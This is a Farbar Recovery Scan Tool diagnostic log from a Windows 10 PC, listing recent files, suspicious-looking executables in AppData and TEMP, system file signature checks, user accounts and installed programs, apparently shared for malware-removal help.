2019-01-09 12:58 - 2019-01-01 08:14 - 001063224 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2019-01-09 12:58 - 2019-01-01 08:14 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2019-01-09 12:58 - 2019-01-01 08:14 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2019-01-09 12:58 - 2019-01-01 08:13 - 000709728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2019-01-09 12:58 - 2019-01-01 08:13 - 000436024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2019-01-09 12:58 - 2019-01-01 08:13 - 000170808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2019-01-09 12:58 - 2019-01-01 08:12 - 000713272 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2019-01-09 12:58 - 2019-01-01 08:12 - 000128824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2019-01-09 12:58 - 2019-01-01 08:12 - 000043536 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2019-01-09 12:58 - 2019-01-01 07:48 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe
2019-01-09 12:58 - 2019-01-01 07:48 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wanarp.sys
2019-01-09 12:58 - 2019-01-01 07:48 - 000079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Print.Workflow.Source.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MicrosoftAccountTokenProvider.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2019-01-09 12:58 - 2019-01-01 07:45 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore.dll
2019-01-09 12:58 - 2019-01-01 07:44 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2019-01-09 12:58 - 2019-01-01 07:41 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2019-01-09 12:58 - 2019-01-01 07:41 - 000895488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000880048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000581808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000381240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2019-01-09 12:58 - 2019-01-01 07:17 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MicrosoftAccountTokenProvider.dll
2019-01-09 12:58 - 2019-01-01 07:16 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2019-01-09 12:58 - 2019-01-01 07:16 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2019-01-09 12:58 - 2019-01-01 07:15 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2019-01-09 12:58 - 2019-01-01 07:15 - 000317440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore.dll
2019-01-09 12:58 - 2019-01-01 07:14 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-01-09 12:58 - 2019-01-01 07:14 - 000330752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.Workflow.dll
2019-01-09 12:58 - 2019-01-01 07:13 - 000594432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2019-01-09 12:58 - 2019-01-01 07:13 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 001036288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 000516608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidprov.dll
2019-01-09 12:58 - 2019-01-01 06:23 - 000001310 _____ C:\WINDOWS\system32\tcbres.wim
2019-01-09 11:06 - 2019-01-09 11:06 - 000031454 _____ C:\Users\ulol\Desktop\The Big Bang Theory - 12x11 - The Paintball Scattering.SVA.English.HI.C.orig.Addic7ed.com.srt
2019-01-07 22:58 - 2019-01-07 22:58 - 000076780 _____ C:\ProgramData\agent.update.1546898284.bdinstall.v2.bin
2019-01-07 21:28 - 2019-01-07 21:37 - 168596427 _____ C:\Users\ulol\Desktop\The.Big.Bang.Theory.S12E11.HDTV.x264-SVA[eztv].mkv
2019-01-07 20:50 - 2018-10-04 22:40 - 000359584 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\Gemma.sys
2019-01-07 20:47 - 2019-01-09 19:03 - 000000000 ____D C:\Program Files\Bitdefender Antivirus Free
2019-01-07 19:45 - 2019-01-11 14:41 - 000000000 ____D C:\ProgramData\Bitdefender
2019-01-07 19:45 - 2018-10-09 14:07 - 000294000 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\edrsensor.sys
2019-01-07 19:44 - 2018-08-22 11:43 - 000357768 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bddci.sys
2019-01-07 19:41 - 2019-01-07 19:41 - 000000000 ____D C:\Users\ulol\AppData\Roaming\QuickScan
2019-01-07 19:36 - 2019-01-07 19:36 - 000103988 _____ C:\ProgramData\agent.1546886203.bdinstall.v2.bin
2019-01-07 19:36 - 2019-01-07 19:36 - 000000000 ____D C:\ProgramData\Bitdefender Agent
2019-01-07 19:34 - 2019-01-07 19:34 - 000000085 _____ C:\WINDOWS\wininit.ini
2019-01-07 19:24 - 2019-01-07 20:33 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2019-01-07 19:24 - 2019-01-07 19:34 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2019-01-07 19:24 - 2019-01-07 19:24 - 000000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2019-01-02 20:51 - 2019-01-02 21:35 - 788517376 _____ C:\Users\ulol\Downloads\Skryta-identita-2006-DVDRip-cz-DABING.avi
2019-01-01 22:49 - 2019-01-01 23:30 - 734048256 _____ C:\Users\ulol\Downloads\Ja Robot - I, Robot (2004) cz dabing.avi
2018-12-25 12:28 - 2018-12-25 14:18 - 1998800896 _____ C:\Users\ulol\Downloads\The-Shining---Osvícení---horor-(1980)-cz.titulky-OD-SOUČKA-TOMÁŠE.avi
2018-12-25 12:22 - 2018-12-25 14:03 - 1109600935 _____ C:\Users\ulol\Downloads\Motýlek (Papillon) 1973(S.McQueen D.Hoffman) bombuj.mp4
2018-12-20 14:07 - 2018-12-14 08:25 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2018-12-20 14:07 - 2018-12-14 07:55 - 003396608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2018-12-20 14:07 - 2018-12-14 07:54 - 006032384 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2018-12-20 14:07 - 2018-12-14 07:52 - 001826816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2018-12-20 14:06 - 2018-12-14 08:29 - 001130760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2018-12-20 14:06 - 2018-12-14 08:21 - 001457240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2018-12-20 14:06 - 2018-12-14 08:21 - 001257672 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2018-12-20 14:06 - 2018-12-14 08:21 - 001140480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2018-12-20 14:06 - 2018-12-14 08:21 - 001098064 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2018-12-20 14:06 - 2018-12-14 08:21 - 000982912 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2018-12-20 14:06 - 2018-12-14 08:10 - 001295360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2018-12-20 14:06 - 2018-12-14 08:07 - 000669696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2018-12-20 14:06 - 2018-12-14 07:55 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2018-12-20 14:06 - 2018-12-14 07:54 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2018-12-20 14:06 - 2018-12-14 07:52 - 002173440 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2018-12-20 14:06 - 2018-12-14 07:51 - 001551360 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2018-12-20 14:06 - 2018-12-14 07:50 - 000776192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2018-12-13 19:20 - 2019-01-11 23:34 - 000730616 _____ C:\WINDOWS\system32\perfh007.dat
2018-12-13 19:20 - 2019-01-11 23:34 - 000149266 _____ C:\WINDOWS\system32\perfc007.dat
2018-12-13 19:20 - 2018-12-12 19:23 - 000306166 _____ C:\WINDOWS\system32\perfi007.dat
2018-12-13 19:20 - 2018-12-12 19:23 - 000040520 _____ C:\WINDOWS\system32\perfd007.dat
2018-12-13 19:14 - 2018-12-13 19:14 - 000000000 ____D C:\WINDOWS\SysWOW64\de
2018-12-13 19:14 - 2018-12-13 19:14 - 000000000 ____D C:\WINDOWS\system32\de

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-12 00:19 - 2018-04-11 22:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2019-01-12 00:18 - 2018-05-21 21:05 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-01-12 00:03 - 2018-04-12 00:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-01-12 00:02 - 2018-05-21 20:39 - 000000000 ____D C:\Users\ulol
2019-01-11 23:34 - 2018-05-21 20:39 - 002569078 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-01-11 23:34 - 2018-04-12 16:50 - 000716276 _____ C:\WINDOWS\system32\perfh005.dat
2019-01-11 23:34 - 2018-04-12 16:50 - 000144534 _____ C:\WINDOWS\system32\perfc005.dat
2019-01-11 23:34 - 2018-04-12 00:36 - 000000000 ____D C:\WINDOWS\INF
2019-01-11 23:13 - 2018-05-21 20:32 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-01-11 22:43 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\NDF
2019-01-11 18:07 - 2018-04-12 00:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-01-11 18:07 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-01-11 14:35 - 2017-12-19 23:57 - 000000000 ____D C:\Users\ulol\AppData\Local\Packages
2019-01-11 13:31 - 2017-02-01 18:08 - 000000000 ___HD C:\$SysReset
2019-01-11 12:32 - 2017-02-01 23:40 - 000000000 ____D C:\Users\ulol\.smplayer
2019-01-11 11:55 - 2017-02-13 11:53 - 000000000 ____D C:\Users\ulol\AppData\Roaming\vlc
2019-01-10 17:14 - 2017-10-18 10:44 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-09 19:09 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\TextInput
2019-01-09 19:09 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2019-01-09 18:25 - 2018-12-07 17:47 - 000000000 ____D C:\Users\ulol\Downloads\vikings s05
2019-01-09 13:11 - 2017-02-01 23:48 - 000000000 ____D C:\WINDOWS\system32\MRT
2019-01-09 13:08 - 2018-04-12 00:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-01-09 13:08 - 2017-02-01 23:48 - 132790320 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2019-01-03 18:04 - 2017-02-01 23:43 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2019-01-02 20:41 - 2018-11-15 17:52 - 000835480 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2019-01-02 20:41 - 2018-11-15 17:52 - 000179600 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2018-12-27 15:49 - 2018-11-21 19:19 - 000000000 ____D C:\Users\ulol\Downloads\Outlaw King (2018) 720p WEBRip x264 750MB (nItRo)-XpoZ
2018-12-25 12:15 - 2018-09-27 08:38 - 000000000 ____D C:\Users\ulol\Downloads\South.Park.S22
2018-12-23 15:52 - 2018-10-15 12:32 - 000000000 ____D C:\WINDOWS\Minidump
2018-12-22 09:09 - 2018-04-11 16:08 - 000000000 ____D C:\Users\ulol\AppData\Local\WiFi Guard
2018-12-21 10:17 - 2017-02-01 21:32 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2018-12-18 11:27 - 2017-02-01 21:40 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-12-15 12:56 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\en-GB
2018-12-15 12:56 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\en-GB
2018-12-13 20:15 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2018-12-13 20:06 - 2017-12-20 12:46 - 000000000 ___RD C:\Users\ulol\3D Objects
2018-12-13 20:06 - 2017-02-01 21:29 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-12-13 19:20 - 2018-05-21 20:31 - 000401184 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2018-12-13 19:15 - 2018-04-12 16:51 - 000000000 ____D C:\WINDOWS\OCR
2018-12-13 19:14 - 2018-05-20 21:45 - 000000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\winrm
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\WCN
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\Printing_Admin_Scripts
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\winrm
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\WCN
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\slmgr
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\Printing_Admin_Scripts
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\F12
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\dsc
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___RD C:\Program Files\Windows Defender
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\MUI
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\com
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\oobe
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\MUI
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\migwiz
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\com
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\IME
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\Help
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files\Common Files\system
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\system32\Dism
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\servicing
2018-12-13 19:13 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\ShellComponents
2018-12-13 12:03 - 2017-02-01 21:49 - 000000000 ____D C:\Users\ulol\Desktop\cool
2018-12-13 09:09 - 2018-05-22 10:32 - 000000000 ____D C:\Users\ulol\AppData\Local\PlaceholderTileLogoFolder

==================== Files in the root of some directories =======

2019-01-10 17:29 - 2019-01-10 17:29 - 000000004 _____ () C:\ProgramData\ext.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ () C:\ProgramData\lock.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000008 _____ () C:\ProgramData\ts.dat
2017-09-26 07:46 - 2016-08-07 17:04 - 000000422 _____ () C:\Program Files (x86)\update-RiseTombRider.bat
2017-09-26 07:46 - 2013-10-13 06:47 - 000000732 _____ () C:\Program Files (x86)\visit-www.nosteam.ro.html
1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe
2019-01-11 11:20 - 2019-01-11 11:20 - 006161408 _____ () C:\Users\ulol\AppData\Local\dump007.dat
2017-08-29 16:47 - 2017-08-29 16:47 - 000008963 _____ () C:\Users\ulol\AppData\Local\recently-used.xbel
2019-01-11 23:01 - 2019-01-11 23:02 - 000007593 _____ () C:\Users\ulol\AppData\Local\Resmon.ResmonCfg
1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\ulol\AppData\Local\UeaYTEArbi.exe
2019-01-10 17:29 - 2019-01-10 17:29 - 000000003 _____ () C:\Users\ulol\AppData\Local\wbem.ini

Some files in TEMP:
====================
2019-01-10 18:14 - 2019-01-12 00:06 - 000000000 ____D () C:\Users\ulol\AppData\Local\Temp\IE8Shims.dll
2019-01-10 17:29 - 2019-01-10 17:29 - 013205167 _____ (MAL ) C:\Users\ulol\AppData\Local\Temp\neyparstfp3.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-05-21 20:31

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28.09.2018
Ran by Martin (12-01-2019 00:03:25)
Running from C:\Users\ulol\Desktop
Windows 10 Home Version 1803 17134.523 (X64) (2018-05-21 20:07:15)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-195099987-321758953-278711717-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-195099987-321758953-278711717-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-195099987-321758953-278711717-1000 - Limited - Disabled) => C:\Users\defaultuser0
Guest (S-1-5-21-195099987-321758953-278711717-501 - Limited - Disabled)
Martin (S-1-5-21-195099987-321758953-278711717-1001 - Administrator - Enabled) => C:\Users\ulol
WDAGUtilityAccount (S-1-5-21-195099987-321758953-278711717-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 19.010.20069 - Adobe Systems Incorporated)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.320.8504 - BlueStack Systems, Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{585A6A74-1DED-8DA0-32F1-F5EFA485DFB1}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{2CEBB6AA-EC39-DFF2-1F5B-9A98301C4DAB}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{F05F0B6E-9999-55D0-C323-D06DF0E2B59F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{CBABB5FD-BD69-8969-729A-5659E11D9518}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{98527BF3-A8E0-B8CF-7297-436B714FC576}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{D6CD1B25-53E6-C2F8-FA99-F89138A9C86F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{487C3865-3005-F04A-FBA4-F4239E02A847}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{D80AD200-548C-B62B-32AE-BF3CD7AA7EA2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{D21BFF5C-51AA-4C15-1C91-6A1087FDC373}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{A0649E20-C57C-DCFA-AE1B-1CE1CB9D98A8}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{35F79A5D-00E2-8C19-D929-2E85DEA4252D}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{04F0FFCB-D9A5-2332-2697-CA47C0424AF2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{47F2FFDC-3D6A-CED6-0B54-6E7082D5B29B}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{5608D1B6-6483-9FA3-7297-C2CFC3FCE747}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{1FCA484A-5A9E-9C91-F050-257D1F311A0C}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{D8FB03AE-A326-0C12-AC47-B898FE73FA94}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{F7876D2E-CDCD-CE53-0E88-995B57A94B58}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{3BAB5AC8-EF35-FED0-BCEB-9306D05EDE1C}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{746E086C-023A-A79C-DBE1-062E773FF6C8}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{1C44BB26-1941-DB44-D5E8-C455F89EE6E6}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{BE7F26CB-6E91-7673-7130-80C36FBF13DE}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Common Desktop Agent (HKLM\...\{031A0E14-0413-4C97-9772-2639B782F46F}) (Version: 1.62.0 - OEM) Hidden
GIMP 2.8.22 (HKLM\...\GIMP-2_is1) (Version: 2.8.22 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HiSuite (HKLM-x32\...\Hi Suite) (Version: 9.0.2.301 - Huawei Technologies Co.,Ltd)
HitmanPro 3.8 (HKLM\...\HitmanPro38) (Version: 3.8.0.295 - SurfRight B.V.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4653 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: - )
Kingdom Come Deliverance (HKLM-x32\...\Kingdom Come Deliverance_is1) (Version: - )
Malwarebytes verze 3.6.1.2711 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes)
Microsoft Office 365 ProPlus - cs-cz (HKLM\...\O365ProPlusRetail - cs-cz) (Version: 16.0.9126.2336 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-195099987-321758953-278711717-1001\...\OneDriveSetup.exe) (Version: 18.065.0329.0002 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
